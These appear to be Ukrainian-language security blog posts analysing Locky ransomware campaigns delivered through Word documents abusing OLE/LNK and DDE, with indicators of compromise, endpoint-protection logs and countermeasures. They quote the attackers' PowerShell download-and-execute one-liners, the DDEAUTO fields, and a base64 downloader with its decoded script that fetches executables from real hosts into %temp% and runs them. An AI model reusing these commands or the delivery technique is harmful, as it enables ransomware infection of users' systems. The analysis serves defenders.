email > .doc (OLE - LNK - PS) > запитання1? > powershell > GET URL list > GET payload1 > %temp%\*1.exe > GET encoded payload2 > %temp%\*2.exe

* Із схеми викинули проміжне звернення до CMD, команди на завантаження переліку адрес іде напряму з winword на powershell

Принцип дії простий – при відкритті документу жертва бачить прохання клікнути двічі на зображенні

(зображення може бути інакшим – не прив’язуйтеся саме до цієї картинки!)

Подвійний клік спричиняє активацію OLE який видобуває в %tmp% ярлик на виклик powershell із зашитим рядком URL.

Далі усе як раніше. Тільки цього разу без проміжного звернення до cmd.

Контрзаходи:

1) Переконайтеся, що застосували правила для cmd і powershell

2) Блокування доступу до Internet для Powershell (варіант #1)

3) Блокування створення .exe в %temp%

Приклад спрацювання правила на запуск дочірніх процесів:

Маркери компрометації:

Файли з двох різних кампаній.

Invoice INV0000252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring([System.Uri]'h11p:\cornertape.net/eiuhf384'))

443051465

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring([System.Uri]'h11p:\hispanic-models.com/kjsdch7346'))

За посиланням  – некодований набір інструкцій (їм стало ліньки робити обфускації у проганяти через base64)

Зверніть увагу – запис проміжного payload (downloader) у каталог %temp%

$us = "h11p:\ingress.kannste.net/JHGbdc34","h11p:\givagarden.com/JHGbdc34","h11p:\hotelruota.it/JHGbdc34","h11p:\internet-webshops.de/JHGbdc34","h11p:\hilaryandsavio.com/JHGbdc34","h11p:\cirad.or.id/JHGbdc34"
foreach($u in $us){
Try{
Write-Host $u
$f = "$env:temp\h8.exe"
Write-Host $f
$w = New-Object System.Net.WebClient
$w.DownloadFile($u, $f)
Start-Process $f
break
}Catch{}}

Будьте уважні та обережні!

VR

DDE_Locky_311017

Доброго дня, панове.

Вчора вночі була зафіксована чергова спроба доставки Locky Ransomware через документи з DDE.

Схему активації я вже розбирав детально тому зосередимося на маркерах та контрзаходах.

Рівень загрози – усе ще високий, але не через складність атаки, а через те, що ще не всі організації вжили заходів щодо блокування DDE.

Для організацій, що прислухалися до моїх попередніх рекомендацій , рівень загрози – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що обидва payload вже детектуєються по GTI.

Нагадую, що механізм DDE може бути використаний для запуску команд не лише в Word та Excel а й у Outlook.

Користувачам McAfee VSE/ENS раджу ще раз ознайомитися із простими правилами по блокуванню DDE.

Схема атаки:

email > .doc (DDE) > запитання1? > запитання2? > CMD > powershell > GET URL list > GET payload1 > %temp%\*1.exe > GET encoded payload2 > %temp%\*2.exe

Маркери IOC:

Обидва файли що були передані на аналіз відносяться до однієї кампанії, посилання з обох ведуть на один і той самий список URL для завантаження payload1

Документ#1

File name Invoice 081839882 10.31.2017
File size 16.74 KB
SHA-256 7a81c498fa2c4bead2792bfa636d2c32f9f630b92c0aa1cceacfb5403aeb0909

містить таке поле активації Powershell через DDE

DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'h11p:\localesynavesalquiler[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1"

Документ#2

File name Invoice 091312820 10.31.2017
File size 16.73 KB
SHA-256 66c1be89ca96319d92600aefeecade28ecf312682d94846032ad8fa3635a1575

містить таке поле активації Powershell через DDE

DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'h11p:\lopezfranco[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1"

За посиланням знаходиться текст, це кодовані у base64 команди для PowerShell, фактично список посилань на проміжний payload

JAB1AHIAbABzACAAPQAgACIAaAB0AHQAcAA6AC8ALwByAG8AcwBpAGEAdQB0AG8AcwB1AGwAaQAuAGgAdQAvAEgAVQBnAGYAcgBzAGUANwAiACwAIgBoAHQAdABwADoALwAvAGMAcQBhAHEAdQBhAGwAaQB0AGUALgBjAG8AbQAvAEgAVQBnAGYAcgBzAGUANwAiACwAIgBoAHQAdABwADoALwAvAGQAaQBlAHQAZQByAGQAdQByAHMAdABpAGcALgBkAGUALwBIAFUAZwBmAHIAcwBlADcAIgAsACIAaAB0AHQAcAA6AC8ALwBlAGQAaQBmAGkAYwBpAG8AZQB4AHAAbwAuAGMAbwBtAC8ASABVAGcAZgByAHMAZQA3ACIALAAiAGgAdAB0AHAAOgAvAC8AZgBpAHIAcwB0AC0AcABhAHIAaQBzAC0AcAByAG8AcABlAHIAdABpAGUAcwAuAGMAbwBtAC8ASABVAGcAZgByAHMAZQA3ACIALAAiAGgAdAB0AHAAOgAvAC8AaABvAHQAZQBsAHgAYQBnAHUAYQB0AGUALgBjAG8AbQAvAEgAVQBnAGYAcgBzAGUANwAiAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB1AHIAbAAgAGkAbgAgACQAdQByAGwAcwApAHsADQAKAFQAcgB5AA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAkAHUAcgBsAAkADQAKAAkAJABmAHAAIAA9ACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdABpADQALgBlAHgAZQAiAAkADQAKAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACQAZgBwAA0ACgAJACQAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQADQAKAAkAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAZgBwACkADQAKAAkAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZgBwAA0ACgAJAGIAcgBlAGEAawANAAoAfQANAAoAQwBhAHQAYwBoAA0ACgB7AA0ACgAgACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlAA0ACgB9AA0ACgANAAoACQANAAoAfQA=

Якщо декодувати отримаємо:

$urls = "h11p:\rosiautosuli.hu/HUgfrse7","h11p:\cqaqualite[.]com/HUgfrse7","h11p:\dieterdurstig.de/HUgfrse7",
"h11p:\edificioexpo[.]com/HUgfrse7","h11p:\first-paris-properties[.]com/HUgfrse7","h11p:\hotelxaguate[.]com/HUgfrse7" 
foreach($url in $urls){
Try
{
Write-Host $url
$fp = "$env:temp\hti4.exe"
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
   Write-Host $_.Exception.Message
}
}

Цього разу, на відміну від попередніх скрипт містить цілих 6 посилань на проміжний payload.

Для нас, з точки зору захисту систем, важливе те, що запуск цієї команди призводить до завантаження основного тіла з одної із шести переданих адрес та запис тіла у каталог %temp%

Filename      HUgfrse7      >> tmp\hti4.exe
Size            263KiB (268992 bytes)
SHA256      42c403e7c6e811938b843c9ec915b1190ab7095b1451416ba5e65ff530d6d787

Це проміжний payload, він є так званим downloader`ом. Його функція – перевірка системи на відповідність заданим параметрам.

У випадку коли параметри системи задовольняють задані критерії цей шматок коду переходить до завантаження основного тіла Locky Ransomware

hti4.exe > h11p://spooner-motorsport[.]com/UIeu6fgue63

Цей файл розшифровується проміжним payload`ом та запускається на виконання

Filename        23lfo837.exe
Size               597KiB (610816 bytes)
SHA256          ad0a072948cd6dfa2bd7aa79931b0522084ad8d2b9b4e119b4b9c6ef4a1ae89c

Після запуску відбувається процес шифрування файлів.

Зашифровані файли отримують розширення .asasin 

Цей зразок також містить механізм розповсюдження по мережі використовуючи вразливість SMB (EthernalBlue).

Тому достатньо щоб в організації знайшлася хоча би одна довірлива жертва і відсутність виправлень на MS10-017.

Детект по GTI

Робота правила Access Protection

Додаткові (вбудовані) правила Acces Protection які могли би зупинити інфікування

(перед запуском DDE навмисне були переведені в режим LogOnly)

Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\OFFICE15\WINWORD.EXE C:\WINDOWS\SYSWOW64\CMD.EXE User-defined Rules:_DDE_BLK_1(cmd) Action blocked : Read
Would be blocked by port blocking rule (rule is currently not enforced) C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Common Maximum Protection:Prevent HTTP communication 91.142.213.150:80
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP\AUTODETECT Anti-spyware Standard Protection:Protect Internet Explorer favorites and settings Action blocked : Create
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\support C:\USERS\OPERATOR\DESKTOP\P2.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read
Would be blocked by Access Protection rule (rule is currently not enforced) APM11\operator C:\TMP\HTI4.EXE C:\TMP\HTI4.EXE User-defined Rules:tmp_exe_BLK Action blocked : Read

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси (політики Access Protection)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження списку адрес

91.142.213.150:80 HTTP 139 localesynavesalquiler[.]com GET /kdjsw23FGS HTTP/1.1
89.140.72.153:80 HTTP 129 lopezfranco[.]com GET /kdjsw23FGS HTTP/1.1

перебір джерел проміжного payload

87.229.45.38:80 HTTP 127 rosiautosuli[.]hu GET /HUgfrse7 HTTP/1.1
216.250.115.36:80 HTTP 126 cqaqualite[.]com GET /HUgfrse7 HTTP/1.1 
88.80.210.150:80 HTTP 128 dieterdurstig[.]de GET /HUgfrse7 HTTP/1.1
94.23.221.122:80 HTTP 128 edificioexpo[.]com GET /HUgfrse7 HTTP/1.1
151.80.157.121:80 HTTP 138 first-paris-properties[.]com GET /HUgfrse7 HTTP/1.1

завантаження кодованого тіла Locky

77.72.150.42:80   HTTP 147 spooner-motorsport[.]com GET /UIeu6fgue63 HTTP/1.1

Контрзаходи:

  • Заборона створення дочірніх процесів для додатків MS Office
  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR